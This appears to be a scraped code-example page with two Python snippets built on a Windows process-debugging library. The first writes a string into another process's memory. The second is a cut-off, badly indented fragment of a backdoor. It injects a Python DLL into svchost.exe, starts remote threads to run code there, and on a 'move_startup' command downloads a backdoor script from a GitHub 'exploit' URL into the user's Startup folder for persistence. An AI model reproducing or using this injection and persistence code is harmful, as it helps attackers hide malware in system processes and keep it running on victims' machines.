Exemplo n.º 1
def alloc_string(pid, addr, value):
    """Write *value* plus a trailing newline into a fresh buffer in process *pid*.

    The buffer is allocated in the target process with ``Process.malloc`` and
    sized ``len(value) + 1`` to hold the appended ``'\\x0a'`` byte. A hex dump
    of the bytes is printed before the write is attempted.

    Args:
        pid: Identifier of the process whose memory is modified.
        addr: Hexadecimal string. It is parsed with ``int(addr, 16)`` (so a
            malformed value raises ``ValueError`` before the process is
            touched), but the parsed number is not used by the visible code.
        value: String to copy into the target process.

    Raises:
        Exception: whatever ``Process.write`` raises is re-raised after the
            remote buffer has been released with ``Process.free``.

    NOTE(review): ``Process`` and ``HexDump`` are not defined in this listing;
    they look like the winappdbg classes -- confirm against the file's imports.
    NOTE(review): on success the remote address is neither returned nor freed
    here, so the caller has no handle to release it; the listing may be
    truncated -- confirm against the full source.
    """
    # Kept first so an invalid address string fails before any process access.
    int(addr, 16)
    target = Process(pid)

    # One extra byte for the newline appended below.
    remote_buf = target.malloc(len(value) + 1)

    data = value + '\x0a'
    print(HexDump.hexadecimal(data, '\\x'))

    try:
        target.write(remote_buf, data)
    except Exception:
        # Do not leave the allocation behind in the other process when the
        # write fails; the original error still propagates to the caller.
        target.free(remote_buf)
        raise
Exemplo n.º 2
    					s.scan_processes()
    					pl = s.find_processes_by_filename("svchost.exe")
    					pid = pl[0][0].get_pid()
    					p = Process(pid)
    					print('pid', pid)
    					print('arch', p.get_bits())
    					t = p.inject_dll(python_dll)
    					p.scan_modules()
    					m = p.get_module_by_name(python_lib)
    					init = m.resolve("Py_InitializeEx")
    					pyrun = m.resolve("PyRun_SimpleString")
    					print(init, pyrun)
    					p.start_thread(init, 0)
    					time.sleep(0.1)
    					sh = 'import subprocess; subprocess.call("svchost.exe")'
    					addr = p.malloc(len(sh))
    					p.write(addr, sh)
					p.start_thread(pyrun, addr)

					# Movendo o backdoor pro startup
					if dados.startswith("move_startup"):
						url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
						user = getpass.getuser()
						os.chdir("C:\Users\" + user + "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\")
						u = urllib2.urlopen(url)
						f = open(file_name, 'wb')
						meta = u.info()
						file_size = int(meta.getheaders("Content-Length")[0])
						print "Downloading: %s Bytes: %s" % (file_name, file_size)
						file_size_dl = 0
						block_sz = 8192